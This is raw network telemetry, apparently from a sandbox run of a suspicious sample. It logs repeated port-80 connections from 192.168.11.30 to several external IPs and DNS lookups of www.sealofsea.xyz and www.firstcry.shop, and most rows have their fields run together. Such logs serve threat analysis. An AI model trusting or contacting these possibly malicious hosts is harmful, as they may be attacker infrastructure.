Oct 9, 2024 13:03:03.872853041 CEST | 80 | 49827 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:03.873039961 CEST | 49827 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:04.302586079 CEST | 80 | 49826 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:04.302907944 CEST | 49826 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:05.012619019 CEST | 49827 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:06.031017065 CEST | 49828 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:06.398329973 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.398556948 CEST | 49828 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:06.408952951 CEST | 49828 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:06.773515940 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.773528099 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.773592949 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.776392937 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.776427984 CEST | 80 | 49828 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:06.776616096 CEST | 49828 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:07.918386936 CEST | 49828 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:08.936338902 CEST | 49829 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:09.300960064 CEST | 80 | 49829 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:09.301181078 CEST | 49829 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:09.307612896 CEST | 49829 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:09.671385050 CEST | 80 | 49829 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:09.672271967 CEST | 80 | 49829 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:09.672297001 CEST | 80 | 49829 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:09.672799110 CEST | 49829 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:09.675934076 CEST | 49829 | 80 | 192.168.11.30 | 103.255.237.233
Oct 9, 2024 13:03:10.039824009 CEST | 80 | 49829 | 103.255.237.233 | 192.168.11.30
Oct 9, 2024 13:03:14.805134058 CEST | 49830 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:14.899215937 CEST | 80 | 49830 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:14.899482012 CEST | 49830 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:14.910942078 CEST | 49830 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:15.004968882 CEST | 80 | 49830 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:15.016858101 CEST | 80 | 49830 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:15.017555952 CEST | 80 | 49830 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:15.017756939 CEST | 49830 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:16.416199923 CEST | 49830 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:17.435028076 CEST | 49831 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:17.529632092 CEST | 80 | 49831 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:17.529828072 CEST | 49831 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:17.540601015 CEST | 49831 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:17.635143995 CEST | 80 | 49831 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:17.652224064 CEST | 80 | 49831 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:17.652529955 CEST | 80 | 49831 | 104.21.77.69 | 192.168.11.30
Oct 9, 2024 13:03:17.652705908 CEST | 49831 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:19.056250095 CEST | 49831 | 80 | 192.168.11.30 | 104.21.77.69
Oct 9, 2024 13:03:20.074453115 CEST | 49832 | 80 | 192.168.11.30 | 104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.169477940 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.169755936 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.179485083 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.179537058 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.274427891 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.274503946 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.274529934 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286434889 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286745071 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286917925 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:21.680632114 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.698697090 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.793751001 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.793982983 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.800280094 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.895232916 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910089970 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910409927 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910634041 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.913595915 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:23.008595943 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.371642113 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:28.564269066 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.564433098 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:28.574872971 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:28.767455101 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.767903090 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.767980099 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.768176079 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:30.084979057 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.103444099 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.294542074 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.294763088 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.305915117 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:31.496937990 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497334957 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497348070 CEST804983565.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:31.497548103 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:32.818746090 CEST4983580192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:33.836929083 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.034148932 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.034320116 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.045150042 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.045167923 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.242383957 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242439985 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242644072 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242721081 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242785931 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242822886 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:34.242948055 CEST4983680192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:34.439995050 CEST804983665.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:36.573997974 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:36.786999941 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:36.787180901 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:36.801964998 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.015023947 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015255928 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015343904 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:37.015594006 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.022665024 CEST4983780192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:37.235522985 CEST804983765.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:42.249380112 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.348927975 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:42.349131107 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.360498905 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:42.460026026 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:43.863149881 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.003813028 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:44.881449938 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.980911016 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:44.981146097 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:44.990825891 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:45.090197086 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.093775988 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.093940973 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:45.389717102 CEST80498383.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:45.389941931 CEST4983880192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:46.503103971 CEST4983980192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:46.602507114 CEST80498393.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.521140099 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.620538950 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.620758057 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.632370949 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.632419109 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:47.731801033 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.731909037 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.732072115 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.733336926 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:47.733484030 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:49.143177032 CEST4984080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:49.242691040 CEST80498403.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:50.161571026 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.260806084 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:50.260961056 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.267708063 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:50.366997957 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267218113 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267265081 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.267544031 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.269839048 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.271073103 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:51.271260023 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.580028057 CEST4984180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:51.679292917 CEST80498413.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:56.390140057 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.490200996 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:56.490422010 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.501013994 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:56.601069927 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:58.016103983 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:58.159037113 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.034228086 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.133482933 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.133733034 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.144063950 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.243441105 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.246757984 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.246982098 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:03:59.528657913 CEST80498423.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:59.528887033 CEST4984280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:00.656125069 CEST4984380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:04:00.755340099 CEST80498433.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.030472040 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.124524117 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.124696970 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.135679007 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.230092049 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524318933 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524389029 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524513960 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524524927 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524537086 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.524765015 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:50.524766922 CEST804985823.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:50.524986029 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:51.644546986 CEST4985880192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.663394928 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.758172989 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:52.758332014 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.769571066 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:52.864331007 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654623032 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654690027 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654738903 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654752970 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.654865026 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:53.654987097 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:53.655494928 CEST804985923.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:53.655648947 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:54.284616947 CEST4985980192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.303138971 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.398612976 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.398755074 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.408767939 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.408817053 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.503839016 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.504622936 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.504635096 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775000095 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775073051 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775221109 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775304079 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775315046 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775405884 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.775568008 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.775600910 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775851011 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:56.924578905 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:57.942774057 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.037611961 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.037802935 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.045490026 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.139523983 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.270699024 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271025896 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271042109 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271234989 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.273677111 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.367881060 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.620017052 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.720840931 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.720980883 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.731158972 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.830775023 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.831685066 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.253648043 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.353965998 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.354146957 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.366782904 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.466675043 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.466876984 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:08.893558025 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:08.993360043 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:08.993566990 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.004106998 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.004156113 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.104773045 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:09.105194092 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:09.105302095 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.536875010 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.637892008 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.638192892 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.646508932 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.746632099 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747112989 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747235060 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747361898 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747375965 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747483969 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747498989 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747512102 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747519016 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747571945 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747582912 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747689009 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747689009 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747905016 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.752340078 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.852082968 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:16.985682964 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.139560938 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.139806986 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.149975061 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.303585052 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304627895 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304641008 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304786921 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:18.654005051 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.672339916 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.826569080 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.826716900 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.835942030 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.989649057 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990580082 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990592957 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990696907 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:21.340874910 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.359317064 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.513144970 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.513318062 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.528934002 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.528984070 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.682487011 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.682718992 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.683959007 CEST804986854.67.42.145192.168.11.30
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Oct 9, 2024 13:01:38.531209946 CEST | 192.168.11.30 | 1.1.1.1 | 0x7e36 | Standard query (0) | www.sealofsea.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:02:44.520591021 CEST | 192.168.11.30 | 1.1.1.1 | 0x6a1a | Standard query (0) | www.firstcry.shop | A (IP address) | IN (0x0001) | false
